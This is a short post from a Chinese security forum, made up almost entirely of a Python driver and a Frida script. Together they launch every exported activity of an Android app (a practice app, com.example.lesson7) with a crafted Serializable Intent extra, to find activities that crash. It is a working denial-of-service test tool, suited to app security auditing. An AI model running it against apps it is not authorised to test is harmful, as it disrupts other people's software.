[原创]使用frida实现android拒绝服务攻击-Android安全-看雪-安全社区|安全招聘|kanxue.com

[原创]使用frida实现android拒绝服务攻击

发表于: 2020-11-9 15:34 2994

[原创]使用frida实现android拒绝服务攻击

和蔼的哔哔

2020-11-9 15:34

2994

直接上代码：
android_dos.py

import frida
import time
import os
 
def isRunning(packageName):
    for i in range(3): 
        pid =  os.popen("adb shell dumpsys activity top |grep -e ACTIVITY -e TASK")
        strforCmdResult =pid.read()
        if(strforCmdResult.find(packageName)<0):
            # print(strforCmdResult)
            return False
        time.sleep(1)
    return True
 
 
def startActivity(name):
    # print("startactivity:",name)
    device = frida.get_usb_device()
    pid = device.spawn(["com.example.lesson7"])
    device.resume(pid)
    time.sleep(1)
    session = device.attach(pid)
    with open("android_dos.js") as f:
        script = session.create_script(f.read())
    script.on("message",my_message_handler)
    script.load()
    print("start startActiovity: ",name)
    script.exports.invokefund(name)
 
 
def my_message_handler(message,payload):
    print(message)
    print(payload)
 
device = frida.get_usb_device()
pid = device.spawn(["com.example.lesson7"])
device.resume(pid)
time.sleep(1)
session = device.attach(pid)
with open("android_dos.js") as f:
    script = session.create_script(f.read())
script.on("message",my_message_handler)
script.load()
exportedActivitys = script.exports.invokefunc()
for name in exportedActivitys:
    # print("activityName: ",name)
    startActivity(name)
    if(isRunning("com.example.lesson7")is not True):
        print("dos_activity is ",name)
    time.sleep(1)
# input()

android_dos.js

function getAppcontext(){
    const ActivityThread = Java.use("android.app.ActivityThread");
    const currentApplication = ActivityThread.currentApplication();
    return currentApplication.getApplicationContext();
}
 
function getServises(){
 
}
 
function getprovider(){
 
}
 
function getActivityInfos(){
    const context = getAppcontext()
    const PackageManagerhandle = Java.use("android.content.pm.PackageManager")
    var GET_ACTIVITIES = PackageManagerhandle.GET_ACTIVITIES.value
    var packageInfo = context.getPackageManager().getPackageInfo(context.getPackageName(),GET_ACTIVITIES)
    return packageInfo.activities
}
 
function getExportedActivitys(){
    const activityInfos = getActivityInfos()
        let activitys = []
        activityInfos.value.map(info => {
             if(info.exported.value){
                activitys.push(info.name.value)
             }
        })
        return activitys
}
 
function createSerialiZable(){
    var mySerialiZable = Java.registerClass({
        name: 'com.example.mySerialiZable',  
        implements: [Java.use("java.io.Serializable")], 
        methods: {
        }
      })
      return mySerialiZable.$new();
}
 
function startActivity(name){
    const context = getAppcontext()
    const intenthandle = Java.use("android.content.Intent").$new()
    intenthandle.setClassName(context,name)
    intenthandle.putExtra("xp_text",createSerialiZable())
    context.startActivity(intenthandle)
}
 
function main(){
    Java.perform(function(){
        const activitys = getExportedActivitys()
        for(var i = 0;i < activitys.length;i++){
            console.log(activitys[i])
            startActivity(activitys[i])
        }
    })
}
 
// setTimeout(main,100)
rpc.exports = {
    invokefunc:function(){
        var activitys
        Java.perform(function(){
            activitys = getExportedActivitys()
            // console.log(activitys)
        })
        return activitys
    },
    invokefund:function(name){
        Java.perform(function(){
            startActivity(name)
        })
    },
 
}